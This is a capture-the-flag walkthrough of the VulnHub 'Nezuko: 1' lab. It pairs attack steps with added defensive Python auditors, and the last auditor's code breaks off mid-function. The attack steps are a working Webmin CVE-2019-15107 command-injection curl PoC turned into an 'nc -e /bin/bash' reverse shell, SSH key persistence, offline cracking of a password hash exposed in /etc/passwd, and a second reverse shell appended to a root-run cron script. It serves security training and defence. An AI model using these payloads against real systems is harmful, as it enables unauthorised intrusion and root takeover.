
VulnHub Penetration Testing Practice Lab: Nezuko: 1

2019-09-02 22:49 Author: 合天网安实验室

Box description and hints:

Creator : @yunaranyancat (Twitter)

Difficulty : Easy ~ Intermediate

OS Used: Ubuntu 18.04

User : root, zenitsu, nezuko

Hashes : at their home directory

Task: obtain the hash strings in the three users' home directories.

1. Information gathering

Start with nmap:

msf5 > db_nmap -T4 10.1.1.0/24
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-28 16:38 CST
[*] Nmap: Nmap scan report for 10.1.1.1
[*] Nmap: Host is up (0.000061s latency).
[*] Nmap: Not shown: 999 closed ports
[*] Nmap: PORT   STATE SERVICE
[*] Nmap: 53/tcp open  domain
[*] Nmap: MAC Address: 00:50:56:E9:10:7F (VMware)
[*] Nmap: Nmap scan report for 10.1.1.129
[*] Nmap: Host is up (0.00054s latency).
[*] Nmap: Not shown: 998 closed ports
[*] Nmap: PORT   STATE SERVICE
[*] Nmap: 22/tcp open  ssh
[*] Nmap: 80/tcp open  http
[*] Nmap: MAC Address: 00:0C:29:4E:52:32 (VMware)
[*] Nmap: Nmap scan report for 10.1.1.254
[*] Nmap: Host is up (0.000047s latency).
[*] Nmap: All 1000 scanned ports on 10.1.1.254 are filtered
[*] Nmap: MAC Address: 00:50:56:FB:FE:72 (VMware)
[*] Nmap: Nmap scan report for 10.1.1.130
[*] Nmap: Host is up (0.0000060s latency).
[*] Nmap: Not shown: 999 closed ports
[*] Nmap: PORT   STATE SERVICE
[*] Nmap: 22/tcp open  ssh
[*] Nmap: Nmap done: 256 IP addresses (4 hosts up) scanned in 5.49 seconds
msf5 >

Excluding the gateway and the attacking machine itself, we find the target's IP.

Use nmap -p- -A target_ip to probe this IP in more detail:

msf5 > db_nmap -p- -A 10.1.1.129
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-28 16:42 CST
[*] Nmap: Nmap scan report for 10.1.1.129
[*] Nmap: Host is up (0.00060s latency).
[*] Nmap: Not shown: 65532 closed ports
[*] Nmap: PORT      STATE SERVICE VERSION
[*] Nmap: 22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
[*] Nmap: | ssh-hostkey:
[*] Nmap: |   2048 4b:f5:b3:ff:35:a8:c8:24:42:66:64:a4:4b:da:b0:16 (RSA)
[*] Nmap: |   256 2e:0d:6d:5b:dc:fe:25:cb:1b:a7:a0:93:20:3a:32:04 (ECDSA)
[*] Nmap: |_  256 bc:28:8b:e4:9e:8d:4c:c6:42:ab:0b:64:ea:8f:60:41 (ED25519)
[*] Nmap: 80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
[*] Nmap: |_http-server-header: Apache/2.4.29 (Ubuntu)
[*] Nmap: |_http-title: Welcome to my site! - nezuko kamado
[*] Nmap: 13337/tcp open  http    MiniServ 1.920 (Webmin httpd)
[*] Nmap: | http-robots.txt: 1 disallowed entry
[*] Nmap: |_/
[*] Nmap: |_http-title: Login to Webmin
[*] Nmap: MAC Address: 00:0C:29:4E:52:32 (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Linux 3.X|4.X
[*] Nmap: OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
[*] Nmap: OS details: Linux 3.2 - 4.9
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: TRACEROUTE
[*] Nmap: HOP RTT     ADDRESS
[*] Nmap: 1   0.60 ms 10.1.1.129
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 45.59 seconds
msf5 >

Three services/ports are open:

22 (SSH), 80 (HTTP), 13337 (Webmin)

Visiting the HTTP service, we find a slightly eerie animation (Nezuko is a Japanese anime character) and a hint: "Welcome to my site. I didn't put anything yet. Please come back again later". In other words: "nothing to see here" (a protest that only draws attention). As if I'd believe that, you sneaky old man.


After some exploring, there really is nothing exploitable here (the author is honest: when he says there's nothing, there's nothing).

Next, let's look at the Webmin service on port 13337:


2. Getting a shell

Since the Webmin version detected earlier is 1.920, a quick Baidu search (or Google it) turns up this:

Webmin 1.920 - Remote Code Execution (CVE-2019-15107)

https://www.exploit-db.com/exploits/47293

Go straight to the PoC:

root@osboxes:/tmp# cat poc.sh
#!/bin/sh
#
# CVE-2019-15107 Webmin Unauthenticated Remote Command Execution
# based on Metasploit module https://www.exploit-db.com/exploits/47230
# Original advisory: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
# Alternative advisory (spanish): https://blog.nivel4.com/noticias/vulnerabilidad-de-ejecucion-de-comandos-remotos-en-webmin
#
# Fernando A. Lagos B. (Zerial)
# https://blog.zerial.org
# https://blog.nivel4.com
#
# The script sends a flag by a echo command then grep it. If match, target is vulnerable.
#
# Usage: sh CVE-2019-15107.sh https://target:port
# Example: sh CVE-2019-15107.sh https://localhost:10000
# output: Testing for RCE (CVE-2019-15107) on https://localhost:10000: VULNERABLE!
#

FLAG="f3a0c13c3765137bcde68572707ae5c0"
URI=$1;

echo -n "Testing for RCE (CVE-2019-15107) on $URI: ";
curl -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|echo '$FLAG'&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: '$URI'/session_login.cgi'|grep $FLAG>/dev/null 2>&1

if [ $? -eq 0 ];
then
       echo '\033[0;31mVULNERABLE!\033[0m'
else
       echo '\033[0;32mOK! (target is not vulnerable)\033[0m'
fi
#EOF
root@osboxes:/tmp# ./poc.sh https://10.1.1.129:13337
Testing for RCE (CVE-2019-15107) on https://10.1.1.129:13337: VULNERABLE!
root@osboxes:/tmp#

It reports that the target is vulnerable.

That makes things easy: let's get a reverse shell.

Modify poc.sh: replace the `echo '$FLAG'` part of the injected command with nc -e /bin/bash attack_ip port. After the change it looks like this:

echo -n "Testing for RCE (CVE-2019-15107) on $URI: ";
curl -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|nc -e /bin/bash 10.1.1.130 7777&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: '$URI'/session_login.cgi'|grep $FLAG>/dev/null 2>&1

Start an nc listener, then run poc.sh again to receive the shell:

root@osboxes:/tmp# nc -lvp 7777
listening on [any] 7777 ...
10.1.1.129: inverse host lookup failed: Unknown host
connect to [10.1.1.130] from (UNKNOWN) [10.1.1.129] 51590

root@osboxes:/tmp# ./poc.sh https://10.1.1.129:13337
Testing for RCE (CVE-2019-15107) on https://10.1.1.129:13337:
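From the defender's side, the request the PoC sends has a very recognisable shape: a POST to password_change.cgi whose `old` field carries shell metacharacters, with expired=2 set. The following is an added example (not part of the walkthrough, not Webmin code) that inspects captured requests, such as those logged by a reverse proxy or IDS in front of Webmin, and flags that pattern. The three request samples are constructed for the demo; the first mirrors the PoC body shown above.

```python
"""Flag requests that match the CVE-2019-15107 PoC pattern.

Added example for defenders; not part of the walkthrough or of Webmin.
Input is one HTTP request as (path, form body). The request samples at the
bottom are constructed for this demo.
"""
import re
from urllib.parse import parse_qs

# Characters that never belong in a password-change form field but are
# needed to chain a command onto the server-side shell invocation.
SHELL_META = re.compile(r"[|;&`]|\$\(")
WATCHED_FIELDS = ("old", "new1", "new2", "user")


def inspect_request(path: str, body: str) -> list:
    """Return human-readable findings for one request (empty list = clean)."""
    findings = []
    if not path.split("?", 1)[0].endswith("/password_change.cgi"):
        return findings
    fields = parse_qs(body, keep_blank_values=True)
    for name in WATCHED_FIELDS:
        for value in fields.get(name, []):
            if SHELL_META.search(value):
                findings.append(f"shell metacharacter in '{name}': {value!r}")
    # The PoC sets expired=2 to reach the vulnerable code path.
    if fields.get("expired", [""])[0] == "2":
        findings.append("expired=2 on password_change.cgi (PoC pattern)")
    return findings


def scan(requests):
    """Run inspect_request over (path, body) pairs; keep only the hits."""
    hits = {}
    for i, (path, body) in enumerate(requests):
        findings = inspect_request(path, body)
        if findings:
            hits[i] = findings
    return hits


# Constructed samples: the first mirrors the PoC body from the walkthrough,
# the second is a legitimate expired-password change, the third is unrelated.
CONSTRUCTED_REQUESTS = [
    ("/password_change.cgi",
     "user=wheel&pam=&expired=2&old=id|echo f3a0c13c3765137bcde68572707ae5c0"
     "&new1=wheel&new2=wheel"),
    ("/password_change.cgi",
     "user=alice&pam=&expired=1&old=Winter2019!&new1=Spring2020!&new2=Spring2020!"),
    ("/session_login.cgi", "user=alice&pass=hunter2"),
]

if __name__ == "__main__":
    for idx, hits in scan(CONSTRUCTED_REQUESTS).items():
        print(f"request {idx}: " + "; ".join(hits))
```

Detection is a stop-gap: the fix for CVE-2019-15107 shipped in Webmin 1.930, and an administrative interface like this one has no business being reachable from the whole network in the first place.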

Run a few common commands to see what privileges we have:

root@osboxes:/tmp# nc -lvp 7777
listening on [any] 7777 ...
10.1.1.129: inverse host lookup failed: Unknown host
connect to [10.1.1.130] from (UNKNOWN) [10.1.1.129] 51590
id
uid=1000(nezuko) gid=1000(nezuko) groups=1000(nezuko),4(adm),24(cdrom),30(dip),46(plugdev),116(lpadmin),126(sambashare)
ls /
bin
boot

We now have a shell as an ordinary user: nezuko.

Upgrading to an SSH session is simple: generate an ssh key on the attacking machine and write the public key to the target, which allows passwordless ssh login.

Generate the key locally:

root@osboxes:/tmp# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): sshkey
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in sshkey.
Your public key has been saved in sshkey.pub.
The key fingerprint is:
SHA256:DDIRhslt7EUNR8P5py1hq1Q9CXN1nbk8s0XGBi+nAfo root@osboxes
The key's randomart image is:
+---[RSA 2048]----+
| . =+oo=+.  ..oo=|
|  +.+...+.o... =*|
|   oo..  ..= .+++|
|    .o o  =.=  X.|
|        So *E.. =|
|        . + .  . |
|       . . .     |
|        .        |
|                 |
+----[SHA256]-----+
root@osboxes:/tmp#

Copy the public key and, in the target shell, write it into the authorized_keys file.

root@osboxes:/tmp# cat sshkey.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCyD+owxKMrS8dGHsh2Cct8SB6/60S6UsTy/K+eSexh1tC+cT6E9RjtUpbtFnyZBlm9ICmrBlrun0OR8UhoeA0/b8rbl8QZbsDYYj1wHGkrL8QrxzMypfaCUTRl/eu/ADyyvpGtjmxD0utNU56BUypXDYJIZbQ2VKx6FSwTbs0yrVNdiw6exrlF+louJKr28xb4t6+RAe1R/vGI/yAKHZFTlkpc7hz+B4w7F3kdDpg1YtiJslLAkYtbCU1pDvImjSltWHV6zrCQzyRbMya8F1kvEF4UhjTFmnsgCHJfvTXLt8uBBi1kS73fzEzMvlqZ+T/8cMIZdkCjew7/rzCVmshR root@osboxes
root@osboxes:/tmp# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCyD+owxKMrS8dGHsh2Cct8SB6/60S6UsTy/K+eSexh1tC+cT6E9RjtUpbtFnyZBlm9ICmrBlrun0OR8UhoeA0/b8rbl8QZbsDYYj1wHGkrL8QrxzMypfaCUTRl/eu/ADyyvpGtjmxD0utNU56BUypXDYJIZbQ2VKx6FSwTbs0yrVNdiw6exrlF+louJKr28xb4t6+RAe1R/vGI/yAKHZFTlkpc7hz+B4w7F3kdDpg1YtiJslLAkYtbCU1pDvImjSltWHV6zrCQzyRbMya8F1kvEF4UhjTFmnsgCHJfvTXLt8uBBi1kS73fzEzMvlqZ+T/8cMIZdkCjew7/rzCVmshR root@osboxes" > /home/nezuko/.ssh/authorized_keys

Then connect over ssh:

root@osboxes:/tmp# ssh -i sshkey nezuko@10.1.1.129 // log in with the key
The authenticity of host '10.1.1.129 (10.1.1.129)' can't be established.
ECDSA key fingerprint is SHA256:V+CV/i2363VkhS3dZOGMbavZHVA2zbsG5k0emqBTJZ4.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.1.1.129' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.18.0-15-generic x86_64)

* Documentation:  https://help.ubuntu.com
* Management:     https://landscape.canonical.com
* Support:        https://ubuntu.com/advantage


* Canonical Livepatch is available for installation.
  - Reduce system reboots and improve kernel security. Activate at:
    https://ubuntu.com/livepatch

404 packages can be updated.
189 updates are security updates.

Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Wed Aug 21 01:12:52 2019
nezuko@ubuntu:~$ // login successful

Login successful.
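Writing a public key into ~/.ssh/authorized_keys, as done above, is a standard persistence step, and it leaves an artefact a defender can audit. The block below is an added example (not part of the walkthrough, not OpenSSH code): it parses authorized_keys entries, checks that each base64 blob really encodes the key type it declares, computes the same SHA256 fingerprint that `ssh-keygen -lf` prints, and reports any key not on an allowlist. The RSA line is the one from the walkthrough; the ed25519 entry and its `from=` option are synthetic, built inline as a valid encoding rather than a usable key.

```python
"""Audit an authorized_keys file against an allowlist of fingerprints.

Added example for defenders; not from the walkthrough. Options containing
spaces inside quotes are not handled (a known simplification).
"""
import base64
import hashlib
import struct

KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")


def fingerprint(blob_b64):
    """SHA256 fingerprint in OpenSSH's 'SHA256:<unpadded base64>' form."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def declared_type(blob_b64):
    """Key type string embedded at the start of the wire-format blob."""
    raw = base64.b64decode(blob_b64)
    (n,) = struct.unpack(">I", raw[:4])
    return raw[4:4 + n].decode("ascii", "replace")


def parse_authorized_keys(text):
    """One dict per non-comment line: options, type, fingerprint, comment."""
    keys = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        # Options (if any) come first; the key type is the first field that
        # looks like one.
        idx = next((i for i, p in enumerate(parts)
                    if p.startswith(KEY_TYPE_PREFIXES)), None)
        if idx is None or idx + 1 >= len(parts):
            keys.append({"line": lineno, "malformed": True, "raw": line})
            continue
        ktype, blob = parts[idx], parts[idx + 1]
        try:
            fp = fingerprint(blob)
            type_ok = declared_type(blob) == ktype
        except (ValueError, struct.error):
            keys.append({"line": lineno, "malformed": True, "raw": line})
            continue
        keys.append({"line": lineno, "malformed": False,
                     "options": " ".join(parts[:idx]), "type": ktype,
                     "type_ok": type_ok, "fingerprint": fp,
                     "comment": " ".join(parts[idx + 2:])})
    return keys


def unexpected_keys(text, allowed_fingerprints):
    """Entries that are malformed, mislabelled, or not on the allowlist."""
    return [k for k in parse_authorized_keys(text)
            if k["malformed"] or not k["type_ok"]
            or k["fingerprint"] not in allowed_fingerprints]


# Synthetic ed25519 wire format: string "ssh-ed25519" + a 32-byte "key".
_SYNTHETIC_ED25519 = base64.b64encode(
    struct.pack(">I", 11) + b"ssh-ed25519" + struct.pack(">I", 32) + bytes(range(32))
).decode()
ALLOWED = {fingerprint(_SYNTHETIC_ED25519)}

# The RSA key line is the one the walkthrough wrote to nezuko's account.
WALKTHROUGH_RSA = (
    "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCyD+owxKMrS8dGHsh2Cct8SB6/60S6UsTy/"
    "K+eSexh1tC+cT6E9RjtUpbtFnyZBlm9ICmrBlrun0OR8UhoeA0/b8rbl8QZbsDYYj1wHGkrL8"
    "QrxzMypfaCUTRl/eu/ADyyvpGtjmxD0utNU56BUypXDYJIZbQ2VKx6FSwTbs0yrVNdiw6exrl"
    "F+louJKr28xb4t6+RAe1R/vGI/yAKHZFTlkpc7hz+B4w7F3kdDpg1YtiJslLAkYtbCU1pDvIm"
    "jSltWHV6zrCQzyRbMya8F1kvEF4UhjTFmnsgCHJfvTXLt8uBBi1kS73fzEzMvlqZ+T/8cMIZd"
    "kCjew7/rzCVmshR root@osboxes"
)
SAMPLE_AUTHORIZED_KEYS = (
    "# constructed allowlisted deploy key\n"
    f'from="10.0.0.0/8" ssh-ed25519 {_SYNTHETIC_ED25519} deploy@constructed\n'
    + WALKTHROUGH_RSA + "\n"
)

if __name__ == "__main__":
    for k in unexpected_keys(SAMPLE_AUTHORIZED_KEYS, ALLOWED):
        print(f"line {k['line']}: unexpected key {k.get('fingerprint')} "
              f"{k.get('comment', k.get('raw'))}")
```

Run the same check against every home directory's authorized_keys (and root's) from a periodic job, and compare the fingerprints against what your provisioning system expects; a key whose comment is an attacker's hostname, as here, stands out immediately.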

If you don't want the hassle, `python -c 'import pty;pty.spawn("/bin/bash")'` also gives you a usable shell.

3. Lateral escalation

Right now we have a shell as an ordinary user; let's think about how to escalate.

First, look at what the current user can see:

nezuko@ubuntu:~$ pwd
nezuko@ubuntu:~$ ls -l
total 24
drwxr-xr-x 2 nezuko nezuko  4096 Ogos 28 21:45 from_zenitsu
-rw-rw-r-- 1 nezuko nezuko 19535 Ogos 21 00:25 nezuko.txt

See what's in nezuko.txt:

nezuko@ubuntu:~$ cat nezuko.txt
Congratulations! You have found nezuko! Now, try to surpass your limit! Right here, right now...

[large ASCII-art banner omitted]

1af0941e0c4bd4564932184d47dd8bef

A hint and a hash.

Now the from_zenitsu directory:

nezuko@ubuntu:~/from_zenitsu$ ls -l
total 284
-rw-r--r-- 1 root root 54 Ogos 21 01:13 new_message_21-08-2019_01:13
-rw-r--r-- 1 root root 54 Ogos 21 09:11 new_message_21-08-2019_09:11
-rw-r--r-- 1 root root 54 Ogos 21 09:12 new_message_21-08-2019_09:12
....
-rw-r--r-- 1 root root 54 Ogos 28 21:35 new_message_28-08-2019_21:35
-rw-r--r-- 1 root root 54 Ogos 28 21:40 new_message_28-08-2019_21:40
-rw-r--r-- 1 root root 54 Ogos 28 21:45 new_message_28-08-2019_21:45
-rw-r--r-- 1 root root 54 Ogos 28 21:50 new_message_28-08-2019_21:50
-rw-r--r-- 1 root root 54 Ogos 28 21:55 new_message_28-08-2019_21:55
-rw-r--r-- 1 root root 54 Ogos 29  2019 new_message_29-08-2019_00:05
nezuko@ubuntu:~/from_zenitsu$

Interesting: these files look auto-generated, one every 5 minutes.

Open one at random:

nezuko@ubuntu:~/from_zenitsu$ cat new_message_29-08-2019_00\:05
nezuko chan, would you like to go on a date with me? // how flirtatious~~
nezuko@ubuntu:~/from_zenitsu$

So these files are presumably sent by the user zenitsu, yet they are all owned by root, which is intriguing.

So we need to move laterally to the zenitsu user.

First, check the users:

nezuko@ubuntu:~/from_zenitsu$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
avahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
cups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
whoopsie:x:112:117::/nonexistent:/bin/false
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:114:119::/var/lib/saned:/usr/sbin/nologin
pulse:x:115:120:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
colord:x:117:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false
geoclue:x:119:124::/var/lib/geoclue:/usr/sbin/nologin
gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
nezuko:x:1000:1000:nezuko,,,:/home/nezuko:/bin/bash
zenitsu:$6$LbPWwHSD$69t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0:1001:1001:,,,:/home/zenitsu:/bin/bash
sshd:x:122:65534::/run/sshd:/usr/sbin/nologin
nezuko@ubuntu:~/from_zenitsu$

We find zenitsu's password hash written directly into /etc/passwd.
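This is exactly the misconfiguration that shadow passwords exist to prevent: /etc/passwd is world-readable, so any local user can copy the hash and crack it offline, as the next step shows. The block below is an added example (not part of the walkthrough) that audits a passwd listing for hashes stored outside /etc/shadow, for empty password fields, and for extra uid-0 accounts. The sample takes a few lines from the listing above (including the zenitsu entry) and adds two constructed entries.

```python
"""Audit /etc/passwd for password material that belongs in /etc/shadow.

Added example for defenders; not part of the walkthrough. On a shadowed
system field 2 of every entry is a placeholder and the real hash lives in
the root-only /etc/shadow.
"""

PLACEHOLDERS = {"x", "*", "!", "!!"}
HASH_PREFIXES = {"$1$": "md5crypt", "$5$": "sha256crypt",
                 "$6$": "sha512crypt", "$y$": "yescrypt"}


def parse_passwd(text):
    """Yield one dict per entry; blanks and comments are skipped."""
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7 or not parts[2].isdigit() or not parts[3].isdigit():
            yield {"line": lineno, "name": line, "malformed": True}
            continue
        name, pw, uid, gid, _gecos, home, shell = parts
        yield {"line": lineno, "name": name, "password": pw, "uid": int(uid),
               "gid": int(gid), "home": home, "shell": shell, "malformed": False}


def hash_type(field):
    """Name the crypt(3) scheme from its '$id$' prefix, or 'unknown'."""
    for prefix, label in HASH_PREFIXES.items():
        if field.startswith(prefix):
            return label
    return "unknown"


def find_exposed_hashes(text):
    """(name, scheme) for entries whose password field holds a real hash."""
    return [(e["name"], hash_type(e["password"])) for e in parse_passwd(text)
            if not e["malformed"] and e["password"]
            and e["password"] not in PLACEHOLDERS]


def find_empty_passwords(text):
    """Accounts that can log in with no password at all."""
    return [e["name"] for e in parse_passwd(text)
            if not e["malformed"] and e["password"] == ""]


def find_extra_uid0(text):
    """Root-equivalent accounts other than root itself."""
    return [e["name"] for e in parse_passwd(text)
            if not e["malformed"] and e["uid"] == 0 and e["name"] != "root"]


# Constructed sample: four lines from the walkthrough's /etc/passwd listing
# plus two invented entries (guest, toor) to exercise the other checks.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
nezuko:x:1000:1000:nezuko,,,:/home/nezuko:/bin/bash
zenitsu:$6$LbPWwHSD$69t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0:1001:1001:,,,:/home/zenitsu:/bin/bash
guest::1002:1002:constructed no-password account:/home/guest:/bin/bash
toor:x:0:0:constructed second uid 0 account:/root:/bin/bash
"""

if __name__ == "__main__":
    print("hashes in passwd:", find_exposed_hashes(SAMPLE_PASSWD))
    print("empty passwords: ", find_empty_passwords(SAMPLE_PASSWD))
    print("extra uid 0:     ", find_extra_uid0(SAMPLE_PASSWD))
```

The remediation for the zenitsu case is `pwconv`, which moves the hash into /etc/shadow and leaves the placeholder behind; the cracked result below also shows why a password of "password" would have fallen to any wordlist even with shadowing in place.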

Let's try cracking it with John the Ripper: grab a good wordlist and run it.

A Baidu search (or Google it) turns up a wordlist collection: https://github.com/danielmiessler/SecLists

root@osboxes:/tmp# cat zenitsu_hash.txt
$6$LbPWwHSD$69t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0
root@osboxes:/tmp# john --wordlist=rockyou.txt zenitsu_hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password         (?)
1g 0:00:00:01 DONE (2019-08-28 22:38) 0.5780g/s 4439p/s 4439c/s 4439C/s computador..escort
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@osboxes:/tmp# john zenitsu_hash.txt --show
?:password


1 password hash cracked, 0 left
root@osboxes:/tmp#

With a strong wordlist it cracks quickly. Let's switch to the zenitsu user:

nezuko@ubuntu:~/from_zenitsu$ su - zenitsu
Password:
zenitsu@ubuntu:~$ pwd
/home/zenitsu
zenitsu@ubuntu:~$ id
uid=1001(zenitsu) gid=1001(zenitsu) groups=1001(zenitsu)
zenitsu@ubuntu:~$ ls -l
total 16
drwxr-xr-x 2 zenitsu root    4096 Ogos 21 09:39 to_nezuko
-rw-rw-r-- 1 zenitsu zenitsu 9343 Ogos 21 00:28 zenitsu.txt
zenitsu@ubuntu:~$

There's a to_nezuko directory; let's go in:

zenitsu@ubuntu:~$ cd to_nezuko/
zenitsu@ubuntu:~/to_nezuko$ ls -l
total 4
-rw-r--r-- 1 zenitsu root 150 Ogos 21 09:39 send_message_to_nezuko.sh
zenitsu@ubuntu:~/to_nezuko$

It's a script, owned by user zenitsu and group root; its job is presumably to send messages to the nezuko user.

Let's look at the script:

zenitsu@ubuntu:~/to_nezuko$ cat send_message_to_nezuko.sh
#!/bin/bash
date=$(date '+%d-%m-%Y_%H:%M')
echo "nezuko chan, would you like to go on a date with me? " > /home/nezuko/from_zenitsu/new_message_$date
zenitsu@ubuntu:~/to_nezuko$

Right: this is the script that sends nezuko a pestering message every 5 minutes.

4. Getting a root shell

Combining what we have found so far, we guess this script runs as root, which explains why the files in nezuko's from_zenitsu directory are all owned by root.

In that case, if we write the commands we want run as root into this script and let it execute, we get root, right?

But when we try to open the file to modify it, we can't:

"send_message_to_nezuko.sh" E212: Can't open file for writing
Press ENTER or type command to continue

Why is that? Let's check for hidden attributes:

zenitsu@ubuntu:~/to_nezuko$ lsattr send_message_to_nezuko.sh
-----a--------e--- send_message_to_nezuko.sh
zenitsu@ubuntu:~/to_nezuko$

There is an attribute a, i.e. append-only. What does it mean? When a file has the a (append) attribute, users can only append content to it; they cannot delete or modify it. So let's try appending, writing an nc reverse connection directly:

zenitsu@ubuntu:~/to_nezuko$ echo "nc -e /bin/bash 10.1.1.130 9999" >> send_message_to_nezuko.sh
zenitsu@ubuntu:~/to_nezuko$ cat send_message_to_nezuko.sh
#!/bin/bash
date=$(date '+%d-%m-%Y_%H:%M')
echo "nezuko chan, would you like to go on a date with me? " > /home/nezuko/from_zenitsu/new_message_$date
nc -e /bin/bash 10.1.1.130 9999
zenitsu@ubuntu:~/to_nezuko$
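The root cause here is not the append-only attribute but that root executes, on a schedule, a file owned by an unprivileged user; chattr +a only blocks overwriting and deletion, and appending a line is all that is needed. The block below is an added example (not from the walkthrough) of the check a defender would run: given a crontab listing plus `ls -l` and `lsattr` output for each referenced script, it flags non-root ownership, group/world write bits, and the misleading +a case. The crontab entry is assumed, since the walkthrough never shows it; the ls/lsattr lines for the zenitsu script are the ones from the page, the other two scripts are constructed.

```python
"""Audit scripts invoked by a root crontab for write access by other users.

Added example for defenders; not from the walkthrough. Handles the user
crontab format (`crontab -l`): five time fields or an @shortcut, then the
command. The command's first word is taken as the script path.
"""
import re

CRON_RE = re.compile(r"^(?:@\w+|(?:\S+\s+){5})\s*(\S+)")


def cron_commands(crontab_text):
    """Paths of the commands a crontab invokes (env and comment lines skipped)."""
    cmds = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        m = CRON_RE.match(line)
        if m:
            cmds.append(m.group(1))
    return cmds


def parse_ls(line):
    """(mode, owner, group) from one `ls -l` line."""
    mode, _links, owner, group = line.split()[:4]
    return mode, owner, group


def parse_lsattr(line):
    """The flag string from one `lsattr` line."""
    return line.split()[0]


def audit_script(path, ls_line, lsattr_line):
    """Findings for one script that root runs from cron."""
    mode, owner, group = parse_ls(ls_line)
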